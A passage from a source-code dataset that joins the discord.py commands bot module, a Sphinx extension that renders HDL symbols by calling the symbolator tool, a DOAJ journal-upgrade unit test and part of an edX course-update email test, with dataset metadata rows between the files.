plt.plot(clf.scores_)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
os.system("pause")
| gpl-3.0 | 3,795,073,158,633,134,000 | 31.52381 | 79 | 0.63348 | false |
variablehair/Eggplantato | discord/ext/commands/bot.py | 1 | 26536 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
guild = msg.guild
if guild is not None:
return '{0.me.mention} '.format(guild)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = yield from bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from destination.send(bot.command_not_found.format(key))
return
except AttributeError:
yield from destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from destination.send(page)
class BotBase(GroupMixin):
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self._before_invoke = None
self._after_invoke = None
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
if options.pop('self_bot', False):
self._skip_check = lambda x, y: x != y
else:
self._skip_check = lambda x, y: x == y
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
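        # Dispatch to the regular client event handlers first, then fan the
        # event out to any extra listeners registered via add_listener()/listen().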
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
coro = self._run_event(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
        .. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
@asyncio.coroutine
def can_run(self, ctx):
if len(self._checks) == 0:
return True
return (yield from discord.utils.async_all(f(ctx) for f in self._checks))
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
The :meth:`before_invoke` and :meth:`after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro
The coroutine to register as the pre-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
Similar to :meth:`before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro
The coroutine to register as the post-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._after_invoke = coro
return coro
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the command to use. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`discord.on_ready`
The functions being listened to must be a coroutine.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__global_check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member, name)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
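        # Imports the named module and calls its setup(bot) entry point;
        # modules without a setup function are rejected below.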
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[str], str]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def get_context(self, message, *, cls=Context):
"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`process_message`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls: type
The factory class that will be used to create the context.
By default, this is :class:`Context`. Should a custom
class be provided, it must be similar enough to :class:`Context`\'s
interface.
Returns
--------
:class:`Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if self._skip_check(message.author.id, self.user.id):
return ctx
prefix = yield from self.get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return ctx
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return ctx
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.commands.get(invoker)
return ctx
@asyncio.coroutine
def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
yield from ctx.command.invoke(ctx)
except CommandError as e:
yield from ctx.command.dispatch_error(e, ctx)
else:
ctx.command_failed = False
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = CommandNotFound('Command "{}" is not found'.format(ctx.invoked_with))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`get_context` followed by a call to :meth:`invoke`.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
ctx = yield from self.get_context(message)
yield from self.invoke(ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`Bot` except that it is derived from
:class:`discord.AutoShardedClient` instead.
"""
pass
| mit | -222,379,513,342,976,670 | 32.17 | 123 | 0.599525 | false |
kevinpt/symbolator | symbolator_sphinx/symbolator_sphinx.py | 1 | 11655 | # -*- coding: utf-8 -*-
"""
symbolator_sphinx
~~~~~~~~~~~~~~~~~
Allow symbolator-formatted graphs to be included in Sphinx-generated
documents inline.
Derived from sphinx.ext.graphviz.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE.Sphinx for details.
"""
import re
import codecs
import posixpath
from os import path
from subprocess import Popen, PIPE
from hashlib import sha1
from six import text_type
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.statemachine import ViewList
import sphinx
from sphinx.errors import SphinxError
from sphinx.locale import _, __
from sphinx.util import logging
from sphinx.util.i18n import search_image_for_language
from sphinx.util.osutil import ensuredir, ENOENT, EPIPE, EINVAL
if False:
# For type annotation
from typing import Any, Dict, List, Tuple # NOQA
from sphinx.application import Sphinx # NOQA
logger = logging.getLogger(__name__)
class SymbolatorError(SphinxError):
category = 'Symbolator error'
class symbolator(nodes.General, nodes.Inline, nodes.Element):
'''Base class for symbolator node'''
pass
def figure_wrapper(directive, node, caption):
# type: (Directive, nodes.Node, unicode) -> nodes.figure
figure_node = nodes.figure('', node)
if 'align' in node:
figure_node['align'] = node.attributes.pop('align')
parsed = nodes.Element()
directive.state.nested_parse(ViewList([caption], source=''),
directive.content_offset, parsed)
caption_node = nodes.caption(parsed[0].rawsource, '',
*parsed[0].children)
caption_node.source = parsed[0].source
caption_node.line = parsed[0].line
figure_node += caption_node
return figure_node
def align_spec(argument):
# type: (Any) -> bool
return directives.choice(argument, ('left', 'center', 'right'))
class Symbolator(Directive):
"""
Directive to insert HDL symbol.
"""
has_content = True
required_arguments = 0
optional_arguments = 1
final_argument_whitespace = False
option_spec = {
'alt': directives.unchanged,
'align': align_spec,
'caption': directives.unchanged,
'symbolator_cmd': directives.unchanged,
'name': directives.unchanged,
}
def run(self):
# type: () -> List[nodes.Node]
if self.arguments:
document = self.state.document
if self.content:
return [document.reporter.warning(
__('Symbolator directive cannot have both content and '
'a filename argument'), line=self.lineno)]
env = self.state.document.settings.env
argument = search_image_for_language(self.arguments[0], env)
rel_filename, filename = env.relfn2path(argument)
env.note_dependency(rel_filename)
try:
with codecs.open(filename, 'r', 'utf-8') as fp:
symbolator_code = fp.read()
except (IOError, OSError):
return [document.reporter.warning(
__('External Symbolator file %r not found or reading '
'it failed') % filename, line=self.lineno)]
else:
symbolator_code = '\n'.join(self.content)
if not symbolator_code.strip():
return [self.state_machine.reporter.warning(
__('Ignoring "symbolator" directive without content.'),
line=self.lineno)]
node = symbolator()
node['code'] = symbolator_code
node['options'] = {}
if 'symbolator_cmd' in self.options:
node['options']['symbolator_cmd'] = self.options['symbolator_cmd']
if 'alt' in self.options:
node['alt'] = self.options['alt']
if 'align' in self.options:
node['align'] = self.options['align']
if 'name' in self.options:
node['options']['name'] = self.options['name']
caption = self.options.get('caption')
if caption:
node = figure_wrapper(self, node, caption)
self.add_name(node)
return [node]
def render_symbol(self, code, options, format, prefix='symbol'):
# type: (nodes.NodeVisitor, unicode, Dict, unicode, unicode) -> Tuple[unicode, unicode]
"""Render symbolator code into a PNG or SVG output file."""
symbolator_cmd = options.get('symbolator_cmd', self.builder.config.symbolator_cmd)
hashkey = (code + str(options) + str(symbolator_cmd) +
str(self.builder.config.symbolator_cmd_args)).encode('utf-8')
        # Use the name option if present, otherwise fall back to a SHA-1 hash
name = options.get('name', sha1(hashkey).hexdigest())
fname = '%s-%s.%s' % (prefix, name, format)
relfn = posixpath.join(self.builder.imgpath, fname)
outfn = path.join(self.builder.outdir, self.builder.imagedir, fname)
if path.isfile(outfn):
return relfn, outfn
if (hasattr(self.builder, '_symbolator_warned_cmd') and
self.builder._symbolator_warned_cmd.get(symbolator_cmd)):
return None, None
ensuredir(path.dirname(outfn))
# Symbolator expects UTF-8 by default
if isinstance(code, text_type):
code = code.encode('utf-8')
cmd_args = [symbolator_cmd]
cmd_args.extend(self.builder.config.symbolator_cmd_args)
cmd_args.extend(['-i', '-', '-f', format, '-o', outfn])
try:
p = Popen(cmd_args, stdout=PIPE, stdin=PIPE, stderr=PIPE)
except OSError as err:
if err.errno != ENOENT: # No such file or directory
raise
logger.warning('symbolator command %r cannot be run (needed for symbolator '
'output), check the symbolator_cmd setting', symbolator_cmd)
if not hasattr(self.builder, '_symbolator_warned_cmd'):
self.builder._symbolator_warned_cmd = {}
self.builder._symbolator_warned_cmd[symbolator_cmd] = True
return None, None
try:
# Symbolator may close standard input when an error occurs,
# resulting in a broken pipe on communicate()
stdout, stderr = p.communicate(code)
except (OSError, IOError) as err:
if err.errno not in (EPIPE, EINVAL):
raise
# in this case, read the standard output and standard error streams
# directly, to get the error message(s)
stdout, stderr = p.stdout.read(), p.stderr.read()
p.wait()
if p.returncode != 0:
raise SymbolatorError('symbolator exited with error:\n[stderr]\n%s\n'
'[stdout]\n%s' % (stderr, stdout))
if not path.isfile(outfn):
raise SymbolatorError('symbolator did not produce an output file:\n[stderr]\n%s\n'
'[stdout]\n%s' % (stderr, stdout))
return relfn, outfn
def render_symbol_html(self, node, code, options, prefix='symbol',
imgcls=None, alt=None):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode, unicode, unicode) -> Tuple[unicode, unicode] # NOQA
format = self.builder.config.symbolator_output_format
try:
if format not in ('png', 'svg'):
raise SymbolatorError("symbolator_output_format must be one of 'png', "
"'svg', but is %r" % format)
fname, outfn = render_symbol(self, code, options, format, prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
if fname is None:
self.body.append(self.encode(code))
else:
if alt is None:
alt = node.get('alt', self.encode(code).strip())
imgcss = imgcls and 'class="%s"' % imgcls or ''
if format == 'svg':
svgtag = '''<object data="%s" type="image/svg+xml">
<p class="warning">%s</p></object>\n''' % (fname, alt)
self.body.append(svgtag)
else:
if 'align' in node:
self.body.append('<div align="%s" class="align-%s">' %
(node['align'], node['align']))
self.body.append('<img src="%s" alt="%s" %s/>\n' %
(fname, alt, imgcss))
if 'align' in node:
self.body.append('</div>\n')
raise nodes.SkipNode
def html_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_html(self, node, node['code'], node['options'])
def render_symbol_latex(self, node, code, options, prefix='symbol'):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode) -> None
try:
fname, outfn = render_symbol(self, code, options, 'pdf', prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
is_inline = self.is_inline(node)
if is_inline:
para_separator = ''
else:
para_separator = '\n'
if fname is not None:
post = None # type: unicode
if not is_inline and 'align' in node:
if node['align'] == 'left':
self.body.append('{')
post = '\\hspace*{\\fill}}'
elif node['align'] == 'right':
self.body.append('{\\hspace*{\\fill}')
post = '}'
self.body.append('%s\\includegraphics{%s}%s' %
(para_separator, fname, para_separator))
if post:
self.body.append(post)
raise nodes.SkipNode
def latex_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_latex(self, node, node['code'], node['options'])
def render_symbol_texinfo(self, node, code, options, prefix='symbol'):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode) -> None
try:
fname, outfn = render_symbol(self, code, options, 'png', prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
if fname is not None:
self.body.append('@image{%s,,,[symbolator],png}\n' % fname[:-4])
raise nodes.SkipNode
def texinfo_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_texinfo(self, node, node['code'], node['options'])
def text_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
if 'alt' in node.attributes:
self.add_text(_('[symbol: %s]') % node['alt'])
else:
self.add_text(_('[symbol]'))
raise nodes.SkipNode
def man_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
if 'alt' in node.attributes:
self.body.append(_('[symbol: %s]') % node['alt'])
else:
self.body.append(_('[symbol]'))
raise nodes.SkipNode
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_node(symbolator,
html=(html_visit_symbolator, None),
latex=(latex_visit_symbolator, None),
texinfo=(texinfo_visit_symbolator, None),
text=(text_visit_symbolator, None),
man=(man_visit_symbolator, None))
app.add_directive('symbolator', Symbolator)
app.add_config_value('symbolator_cmd', 'symbolator', 'html')
app.add_config_value('symbolator_cmd_args', ['-t'], 'html')
app.add_config_value('symbolator_output_format', 'svg', 'html')
return {'version': '1.0', 'parallel_read_safe': True}
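# Minimal conf.py wiring for this extension (a sketch; the module name and
# the command path are assumptions -- only the config value names and their
# defaults are taken from setup() above):
#
#   extensions = ['symbolator_sphinx']
#   symbolator_cmd = '/usr/local/bin/symbolator'
#   symbolator_cmd_args = ['-t']
#   symbolator_output_format = 'svg'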
| mit | -7,638,436,865,975,615,000 | 35.083591 | 120 | 0.599399 | false |
DOAJ/doaj | doajtest/unit/test_upgrade.py | 1 | 2252 | import json
import time
import re
from collections import OrderedDict
from doajtest.helpers import DoajTestCase
from portality import models
from portality.upgrade import do_upgrade
from portality.lib.paths import rel2abs
def operation(journal):
j = models.Journal.pull(journal.id)
bj = j.bibjson()
bj.title = "Updated Title"
j.save()
return j
class TestUpgrade(DoajTestCase):
def test_upgrade(self):
# populate the index with some journals with title
saved_journals = {}
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.title = "Test Journal"
bj.add_identifier(bj.P_ISSN, "{x}000-0000".format(x=i))
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# and with some journals without title
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.add_identifier(bj.P_ISSN, "{x}000-0001".format(x=i))
bj.title = "Journal to Change"
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# make sure the last updated dates will be suitably different after migration
time.sleep(1.5)
        path = rel2abs(__file__, ".", "resources", "migrate.json")
with open(path) as f:
instructions = json.loads(f.read(), object_pairs_hook=OrderedDict)
        do_upgrade(instructions, None)
p = re.compile('[0-4]000-0001')
for id in saved_journals:
j = models.Journal.pull(id)
bj = j.bibjson()
pissn = bj.get_one_identifier(bj.P_ISSN)
if not p.match(pissn):
assert bj.title == "Test Journal"
assert j.last_updated == saved_journals[j.id]
else:
assert bj.title == "Updated Title"
assert not j.last_updated == saved_journals[j.id]
| apache-2.0 | 5,705,412,087,984,378,000 | 27.506329 | 85 | 0.567496 | false |
ESOedX/edx-platform | openedx/core/djangoapps/schedules/management/commands/tests/test_send_course_update.py | 1 | 4396 | """
Tests for send_course_update management command.
"""
from __future__ import absolute_import
from unittest import skipUnless
import ddt
from django.conf import settings
from edx_ace.utils.date import serialize
from mock import patch
from six.moves import range
from openedx.core.djangoapps.schedules import resolvers, tasks
from openedx.core.djangoapps.schedules.config import COURSE_UPDATE_WAFFLE_FLAG
from openedx.core.djangoapps.schedules.management.commands import send_course_update as nudge
from openedx.core.djangoapps.schedules.management.commands.tests.send_email_base import (
ExperienceTest,
ScheduleSendEmailTestMixin
)
from openedx.core.djangoapps.schedules.management.commands.tests.upsell_base import ScheduleUpsellTestMixin
from openedx.core.djangoapps.schedules.models import ScheduleExperience
from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag
from openedx.core.djangolib.testing.utils import skip_unless_lms
from student.tests.factories import CourseEnrollmentFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
@ddt.ddt
@skip_unless_lms
@skipUnless(
'openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed",
)
class TestSendCourseUpdate(ScheduleUpsellTestMixin, ScheduleSendEmailTestMixin, ModuleStoreTestCase):
__test__ = True
# pylint: disable=protected-access
resolver = resolvers.CourseUpdateResolver
task = tasks.ScheduleCourseUpdate
deliver_task = tasks._course_update_schedule_send
command = nudge.Command
deliver_config = 'deliver_course_update'
enqueue_config = 'enqueue_course_update'
expected_offsets = list(range(-7, -77, -7))
experience_type = ScheduleExperience.EXPERIENCES.course_updates
queries_deadline_for_each_course = True
def setUp(self):
super(TestSendCourseUpdate, self).setUp()
self.highlights_patcher = patch('openedx.core.djangoapps.schedules.resolvers.get_week_highlights')
mock_highlights = self.highlights_patcher.start()
mock_highlights.return_value = [u'Highlight {}'.format(num + 1) for num in range(3)]
self.addCleanup(self.stop_highlights_patcher)
def stop_highlights_patcher(self):
"""
Stops the patcher for the get_week_highlights method
if the patch is still in progress.
"""
if self.highlights_patcher is not None:
self.highlights_patcher.stop()
@ddt.data(
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.default, offset=expected_offsets[0], email_sent=False),
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.course_updates, offset=expected_offsets[0], email_sent=True),
ExperienceTest(experience=None, offset=expected_offsets[0], email_sent=False),
)
def test_schedule_in_different_experience(self, test_config):
self._check_if_email_sent_for_experience(test_config)
@override_waffle_flag(COURSE_UPDATE_WAFFLE_FLAG, True)
@patch('openedx.core.djangoapps.schedules.signals.get_current_site')
